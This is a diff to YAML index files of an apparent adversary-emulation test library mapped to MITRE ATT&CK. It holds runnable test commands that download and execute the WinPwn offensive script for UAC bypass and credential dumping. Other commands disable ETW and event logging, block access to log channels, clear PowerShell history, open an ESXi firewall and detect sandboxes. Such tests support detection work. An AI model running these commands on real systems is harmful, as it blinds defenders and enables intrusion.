+      description: 'Upon successful execution, this test will enumerate common resources
+        that are contained within a valid Azure subscription.
+
+        '
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        client_id:
+          description: Azure AD client ID
+          type: string
+          default:
+        client_secret:
+          description: Azure AD client secret
+          type: string
+          default:
+        tenant_id:
+          description: Azure AD tenant ID
+          type: string
+          default:
+        cloud:
+          description: Azure cloud environment
+          type: string
+          default: AzureCloud
+        output_directory:
+          description: Directory to output results to
+          type: string
+          default: "$env:TMPDIR/azure_discovery"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The Az module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Force
+
+          '
+      executor:
+        command: |
+          Import-Module "PathToAtomicsFolder\T1526\src\AzureDiscovery.ps1"
+          $client_id = "#{client_id}"
+          $client_secret = "#{client_secret}"
+          $tenant_id = "#{tenant_id}"
+          $environment = "#{cloud}"
+          Set-AzureAuthentication -ClientID $client_id -ClientSecret $client_secret -TenantID $tenant_id -Environment $environment
+          Get-AzureDiscoveryData -OutputDirectory "#{output_directory}" -Environment $environment
+          Remove-BlankFiles -OutputDirectory "#{output_directory}"
+        name: powershell
   T1018:
     technique:
       modified: '2023-08-14T19:08:59.741Z'
@@ -57593,7 +57648,7 @@ reconnaissance:
         privileges and move laterally. "
       modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Wordlist Scanning
+      name: 'Active Scanning: Wordlist Scanning'
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
         of scanning, such as large quantities originating from a single source (especially
         if the source is known to be associated with an adversary/botnet). Monitor
@@ -57611,6 +57666,7 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1595.003
     atomic_tests: []
   T1591.004:
     technique:

atomics/Indexes/iaas_gcp-index.yaml

@@ -20957,7 +20957,7 @@ privilege-escalation:
         prereq_command: 'stat "$PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate"
 
           '
-        get_prereq_command: |-
+        get_prereq_command: |
           cd "$PathToAtomicsFolder/T1098/src/T1098-17/"
           terraform init
           terraform apply -auto-approve
@@ -25744,7 +25744,7 @@ execution:
   T1059.010:
     technique:
       modified: '2024-04-28T15:58:48.119Z'
-      name: AutoHotKey & AutoIT
+      name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
@@ -25796,6 +25796,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059.010
     atomic_tests: []
   T1059.009:
     technique:
@@ -27134,6 +27135,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1651
     atomic_tests: []
   T1059.005:
     technique:
@@ -27309,6 +27311,7 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1648
     atomic_tests: []
   T1204.001:
     technique:
@@ -33304,7 +33307,7 @@ persistence:
         prereq_command: 'stat "$PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate"
 
           '
-        get_prereq_command: |-
+        get_prereq_command: |
           cd "$PathToAtomicsFolder/T1098/src/T1098-17/"
           terraform init
           terraform apply -auto-approve
@@ -57240,7 +57243,7 @@ reconnaissance:
         privileges and move laterally. "
       modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Wordlist Scanning
+      name: 'Active Scanning: Wordlist Scanning'
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
         of scanning, such as large quantities originating from a single source (especially
         if the source is known to be associated with an adversary/botnet). Monitor
@@ -57258,6 +57261,7 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1595.003
     atomic_tests: []
   T1591.004:
     technique:
@@ -59620,7 +59624,7 @@ impact:
         prereq_command: 'stat "$PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate"
 
           '
-        get_prereq_command: |-
+        get_prereq_command: |
           cd "$PathToAtomicsFolder/T1485/src/T1485-4/"
           terraform init
           terraform apply -auto-approve

atomics/Indexes/index.yaml

@@ -771,7 +771,7 @@ defense-evasion:
           default: "'%windir%\\System32\\calc.exe'"
       executor:
         command: rundll32.exe zipfldr.dll,RouteTheCall "#{exe_to_launch}"
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
   T1027.009:
@@ -3107,7 +3107,6 @@ defense-evasion:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
         name: powershell
@@ -3118,7 +3117,6 @@ defense-evasion:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
         name: powershell
@@ -3129,7 +3127,6 @@ defense-evasion:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
         name: powershell
@@ -4819,7 +4816,7 @@ defense-evasion:
           Get-WmiObject -Query "SELECT * FROM MSAcpi_ThermalZoneTemperature" -ErrorAction SilentlyContinue
           if($error) {echo "Virtualization Environment detected"}
         cleanup_command: "$error.clear()\n"
-    - name: Detect Virtualization Environment (MacOS)
+    - name: Detect Virtualization Environment via ioreg
       auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09
       description: 'ioreg contains registry entries for all the device drivers in
         the system. If it''s a virtual machine, one of the device manufacturer will
@@ -4851,6 +4848,49 @@ defense-evasion:
           $Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Manufacturer"
           $Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Model"
           if((($Manufacturer.ToLower() -eq "microsoft corporation") -and ($Model.ToLower().contains("virtual"))) -or ($Manufacturer.ToLower().contains("vmware")) -or ($Model.ToLower() -eq "virtualbox")) {write-host "Virtualization environment detected!"} else {write-host "No virtualization environment detected!"}
+    - name: Detect Virtualization Environment using sysctl (hw.model)
+      auto_generated_guid: 6beae646-eb4c-4730-95be-691a4094408c
+      description: |
+        sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware
+        but will return the hypervisor name (VMware7,0).
+        Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'if [ "$(sysctl -n hw.model | grep -v ''Mac'')" != "" ]; then echo
+          ''Virtualization Environment detected''; fi;
+
+          '
+    - name: Check if System Integrity Protection is enabled
+      auto_generated_guid: 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945
+      description: "The latest versions of macOS have the System Integrity Protection
+        feature (SIP). If a sandbox uses a non-signed \nkernel extension for monitoring
+        purposes the, SIP feature must be disabled to load this kind of kernel extension.\nMalware
+        may check if the SIP is enabled.\nReference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip\n"
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'if [ "$(csrutil status | grep -v ''enabled'')" != "" ]; then echo
+          ''Possible Virtualization Environment detected''; fi;
+
+          '
+    - name: Detect Virtualization Environment using system_profiler
+      auto_generated_guid: e04d2e89-de15-4d90-92f9-a335c7337f0f
+      description: "system_profiler provides system hardware and software configuration
+        and the Model Identifier should provide the value similar to (sysctl -n hw.model).
+        \nWe should be able to find whether virtualization is enabled by checking
+        whether the Model Identifier does not contain \"Mac\".\n"
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier"
+          | grep -v ''Mac'')" != "" ]; then echo ''Virtualization Environment detected'';
+          fi;
+
+          '
   T1070.002:
     technique:
       x_mitre_platforms:
@@ -5051,7 +5091,7 @@ defense-evasion:
       executor:
         command: |
           cat /dev/null > /var/log/messages #truncating the file to zero bytes
-          cat /dev/zero > /var/lol/messages #log file filled with null bytes(zeros)
+          cat /dev/zero > /var/log/messages #log file filled with null bytes(zeros)
         name: sh
         elevation_required: true
     - name: System log file deletion via find utility
@@ -6687,6 +6727,36 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: SubInAcl Execution
+      auto_generated_guid: a8568b10-9ab9-4140-a523-1c72e0176924
+      description: This test simulates an adversary executing the Windows Resource
+        kit utility SubInAcl. This utility was abused by adversaries in the past in
+        order to modify access permissions. Upon execution, a process creation log
+        should be generated indicating successful execution.
+      supported_platforms:
+      - windows
+      input_arguments:
+        SubInAclDownloadPath:
+          type: string
+          default: https://web.archive.org/web/20120528222424if_/http://download.microsoft.com/download/1/7/d/17d82b72-bc6a-4dc8-bfaa-98b37b22b367/subinacl.msi
+          description: Download URL for SubInAcl
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Download subinacl
+
+          '
+        prereq_command: 'if (Test-Path "Test-Path C:\Program Files (x86)\Windows Resource
+          Kits\Tools\subinacl.exe") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |-
+          New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory | Out-Null
+          Invoke-WebRequest #{SubInAclDownloadPath} -OutFile C:\Users\Public\SubInAcl\SubInAcl.msi
+          msiexec.exe /i "C:\Users\Public\SubInAcl\SubInAcl.msi" /qn
+      executor:
+        command: '"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"'
+        name: command_prompt
+        elevation_required: true
   T1574.014:
     technique:
       modified: '2024-04-28T15:44:25.342Z'
@@ -7819,6 +7889,21 @@ defense-evasion:
 
           '
         name: powershell
+    - name: Clear PowerShell Session History
+      auto_generated_guid: 22c779cd-9445-4d3e-a136-f75adbf0315f
+      description: "This technique involves using the Clear-History cmdlet in PowerShell
+        to remove all records of previously executed commands.\nThis action is often
+        performed by attackers to eliminate traces of their activities, making incident
+        detection and forensic \ninvestigation more challenging. By clearing the session
+        history, adversaries aim to obfuscate their operational footprint.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'Clear-History
+
+          '
+        name: powershell
+        elevation_required: false
   T1202:
     technique:
       modified: '2024-10-03T14:47:17.154Z'
@@ -7961,7 +8046,7 @@ defense-evasion:
           default: C:\Windows\System32\calc.exe
       executor:
         command: Scriptrunner.exe -appvscript "#{payload_path}"
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
     - name: Indirect Command Execution - RunMRU Dialog
@@ -8396,7 +8481,7 @@ defense-evasion:
           text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()),
           key)]); command = "#{encrypted_command}"; key = "#{xor_key}"; exec = xor_decrypt(command,
           key); subprocess.call(exec, shell=True)'''
-        cleanup_command: 
+        cleanup_command:
         name: bash
         elevation_required: false
   T1562:
@@ -10596,7 +10681,6 @@ defense-evasion:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           mimiload -consoleoutput -noninteractive
         name: powershell
@@ -11246,6 +11330,66 @@ defense-evasion:
 
           '
         name: command_prompt
+    - name: Modify Event Log Channel Access Permissions via Registry - PowerShell
+      auto_generated_guid: 8e81d090-0cd6-4d46-863c-eec11311298f
+      description: |-
+        This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+        Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+      supported_platforms:
+      - windows
+      input_arguments:
+        ChannelPath:
+          type: string
+          default: HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-TaskScheduler/Operational
+          description: Path to the event log service channel to alter
+      executor:
+        command: "Set-ItemProperty -Path #{ChannelPath} -Name \"ChannelAccess\" -Value
+          \"O:SYG:SYD:(D;;0x1;;;WD)\"\nRestart-Service -Name EventLog -Force -ErrorAction
+          Ignore "
+        cleanup_command: |-
+          Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S-1-15-3-1024-3153509613-960666767-3724611135-2725662640-12138253-543910227-1950414635-4190290187)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573)"
+          Restart-Service -Name EventLog -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
+      auto_generated_guid: 85e6eff8-3ed4-4e03-ae50-aa6a404898a5
+      description: |-
+        This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+        Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+      supported_platforms:
+      - windows
+      input_arguments:
+        ChannelPath:
+          type: string
+          default: HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\Setup
+          description: Path to the event log service channel to alter
+      executor:
+        command: |-
+          New-Item -Path #{ChannelPath} -Force
+          Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
+          Restart-Service -Name EventLog -Force -ErrorAction Ignore
+        cleanup_command: |-
+          Remove-Item -Path #{ChannelPath} -Force
+          Restart-Service -Name EventLog -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: Modify Event Log Access Permissions via Registry - PowerShell
+      auto_generated_guid: a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1
+      description: |-
+        This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+        Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+      supported_platforms:
+      - windows
+      input_arguments:
+        CustomSDPath:
+          type: string
+          default: HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\System
+          description: Path to the event log service channel to alter
+      executor:
+        command: 'Set-ItemProperty -Path #{CustomSDPath} -Name "CustomSD" -Value "O:SYG:SYD:(D;;0x1;;;WD)"'
+        cleanup_command: 'Remove-ItemProperty -Path #{CustomSDPath} -Name "CustomSD"'
+        name: powershell
+        elevation_required: true
   T1218.002:
     technique:
       x_mitre_platforms:
@@ -11970,7 +12114,7 @@ defense-evasion:
           iptables NOT installed *****\n"; exit 1; fi
 
           '
-        get_prereq_command: 'echo ""
+        get_prereq_command: 'sudo apt-get install iptables
 
           '
       executor:
@@ -12127,6 +12271,53 @@ defense-evasion:
         cleanup_command: Remove-NetFirewallRule -DisplayName "New rule"
         name: powershell
         elevation_required: true
+    - name: ESXi - Set Firewall to PASS Traffic
+      auto_generated_guid: a67e8aea-ea7c-4c3b-9b1b-8c2957c3091d
+      description: 'This test sets the default ESXi firewall action to PASS instead
+        of DROP. This allows all incoming and outgoing traffic.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi server.
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on the ESXi server.
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privileged user's password.
+          type: string
+          default: password
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "esxcli network firewall set --default-action true"
+
+          '
+        cleanup_command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "esxcli network firewall set --default-action false"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1553.003:
     technique:
       x_mitre_platforms:
@@ -17116,6 +17307,63 @@ defense-evasion:
           '
         name: powershell
         elevation_required: true
+    - name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry
+        - Cmd
+      auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b
+      description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
+        environment variable to 0 in the HKCU registry using the reg.exe utility.
+        In order for changes to take effect a logout might be required.
+      supported_platforms:
+      - windows
+      executor:
+        command: REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
+        cleanup_command: REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul
+          2>&1
+        name: command_prompt
+    - name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry
+        - PowerShell
+      auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee
+      description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
+        environment variable to 0 in the HKCU registry using PowerShell. In order
+        for changes to take effect a logout might be required.
+      supported_platforms:
+      - windows
+      executor:
+        command: New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
+          -Value 0 -PropertyType "String" -Force
+        cleanup_command: Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
+        name: powershell
+    - name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry
+        - Cmd
+      auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf
+      description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
+        environment variable to 0 in the HKLM registry using the reg.exe utility.
+        In order for changes to take effect a reboot might be required.
+      supported_platforms:
+      - windows
+      executor:
+        command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment"
+          /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
+        cleanup_command: REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session
+          Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry
+        - PowerShell
+      auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911
+      description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
+        environment variable to 0 in the HKLM registry using PowerShell. In order
+        for changes to take effect a reboot might be required.
+      supported_platforms:
+      - windows
+      executor:
+        command: New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session
+          Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String"
+          -Force
+        cleanup_command: Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session
+          Manager\Environment" -Name COMPlus_ETWEnabled
+        name: powershell
+        elevation_required: true
   T1562.007:
     technique:
       modified: '2024-10-16T19:38:57.374Z'
@@ -17484,7 +17732,7 @@ defense-evasion:
           description: Ticket file name usually format of 'id-username\@domain.kirbi'
             (e.g. can be dumped by "sekurlsa::tickets /export" module)
           type: string
-          default: 
+          default:
         mimikatz_exe:
           description: Path of the Mimikatz binary
           type: path
@@ -18121,6 +18369,7 @@ defense-evasion:
           Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
           Stop-process -name "hello" -Force -ErrorAction ignore
         name: powershell
+        elevation_required: true
     - name: Remove the Zone.Identifier alternate data stream
       auto_generated_guid: 64b12afc-18b8-4d3f-9eab-7f6cae7c73f9
       description: |
@@ -22059,11 +22308,11 @@ defense-evasion:
         username:
           description: office-365 username
           type: string
-          default: 
+          default:
         password:
           description: office-365 password
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'ExchangeOnlineManagement PowerShell module must be installed
@@ -22184,8 +22433,7 @@ defense-evasion:
       supported_platforms:
       - windows
       executor:
-        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
-          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom
+        command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom
           -consoleoutput -noninteractive  "
         name: powershell
     - name: Tamper with Windows Defender ATP using Aliases - PowerShell
@@ -22804,6 +23052,81 @@ defense-evasion:
           '
         name: powershell
         elevation_required: true
+    - name: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
+      auto_generated_guid: 653c6e17-14a2-4849-851d-f1c0cc8ea9ab
+      description: This atomic simulates an activity where an attacker disables the
+        EventLog-Application ETW Auto Logger session using the reg.exe utility to
+        update the Windows registry value "Start". This would effectivly disable the
+        Event log application channel. The changes would only take effect after a
+        restart.
+      supported_platforms:
+      - windows
+      executor:
+        command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
+          /v "Start" /t REG_DWORD /d "0" /f
+        cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
+          /v "Start" /t REG_DWORD /d "1" /f
+        name: command_prompt
+        elevation_required: true
+    - name: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
+      auto_generated_guid: da86f239-9bd3-4e85-92ed-4a94ef111a1c
+      description: This atomic simulates an activity where an attacker disables the
+        EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty"
+        cmdlet to update the Windows registry value "Start". This would effectivly
+        disable the Event log application channel. The changes would only take effect
+        after a restart.
+      supported_platforms:
+      - windows
+      executor:
+        command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
+          -Name Start -Value 0 -PropertyType "DWord" -Force
+        cleanup_command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
+          -Name Start -Value 1 -PropertyType "DWord" -Force
+        name: powershell
+        elevation_required: true
+    - name: Disable EventLog-Application ETW Provider Via Registry - Cmd
+      auto_generated_guid: 1cac9b54-810e-495c-8aac-989e0076583b
+      description: This atomic simulates an activity where an attacker disables a
+        specific ETW provider from the EventLog-Application ETW Auto Logger session
+        using the reg.exe utility to update the Windows registry value "Enabled".
+        This would effectivly remove that provider from the session and cause to not
+        emit any logs of that type. The changes would only take effect after a restart.
+      supported_platforms:
+      - windows
+      input_arguments:
+        ETWProviderGUID:
+          type: string
+          default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
+          description: Microsoft-Windows-SenseIR ETW Provider GUID
+      executor:
+        command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          /v "Enabled" /t REG_DWORD /d "0" /f
+        cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          /v "Enabled" /t REG_DWORD /d "1" /f
+        name: command_prompt
+        elevation_required: true
+    - name: Disable EventLog-Application ETW Provider Via Registry - PowerShell
+      auto_generated_guid: 8f907648-1ebf-4276-b0f0-e2678ca474f0
+      description: This atomic simulates an activity where an attacker disables a
+        specific ETW provider from the EventLog-Application ETW Auto Logger session
+        using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry
+        value "Enabled". This would effectivly remove that provider from the session
+        and cause to not emit any logs of that type. The changes would only take effect
+        after a restart.
+      supported_platforms:
+      - windows
+      input_arguments:
+        ETWProviderGUID:
+          type: string
+          default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
+          description: Microsoft-Windows-SenseIR ETW Provider GUID
+      executor:
+        command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          -Name Enabled -Value 0 -PropertyType "DWord" -Force
+        cleanup_command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          -Name Enabled -Value 1 -PropertyType "DWord" -Force
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       x_mitre_platforms:
@@ -26758,11 +27081,11 @@ defense-evasion:
         username:
           description: Azure username
           type: string
-          default: 
+          default:
         password:
           description: Azure password
           type: string
-          default: 
+          default:
         event_hub_name:
           description: Name of the eventhub
           type: string
@@ -26770,11 +27093,11 @@ defense-evasion:
         resource_group:
           description: Name of the resource group
           type: string
-          default: 
+          default:
         name_space_name:
           description: Name of the NameSpace
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'Install-Module -Name Az
@@ -26837,11 +27160,11 @@ defense-evasion:
         username:
           description: office-365 username
           type: string
-          default: 
+          default:
         password:
           description: office-365 password
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'ExchangeOnlineManagement PowerShell module must be installed
@@ -27092,7 +27415,7 @@ defense-evasion:
           echo "*** Log Group Created ***"
           aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
           echo "*** Log Group Deleted ***"
-        cleanup_command: 
+        cleanup_command:
         name: sh
         elevation_required: false
     - name: AWS CloudWatch Log Stream Deletes
@@ -27137,7 +27460,7 @@ defense-evasion:
           echo "*** Log Stream Deleted ***"
           aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
           echo "*** Log Group Deleted ***"
-        cleanup_command: 
+        cleanup_command:
         name: sh
         elevation_required: false
     - name: Office 365 - Set Audit Bypass For a Mailbox
@@ -32203,7 +32526,6 @@ defense-evasion:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           obfuskittiedump -consoleoutput -noninteractive
         name: powershell
@@ -32215,7 +32537,6 @@ defense-evasion:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           safedump -consoleoutput -noninteractive
         name: powershell
@@ -34766,7 +35087,6 @@ privilege-escalation:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
         name: powershell
@@ -34777,7 +35097,6 @@ privilege-escalation:
       - windows
       executor:
         command: |-
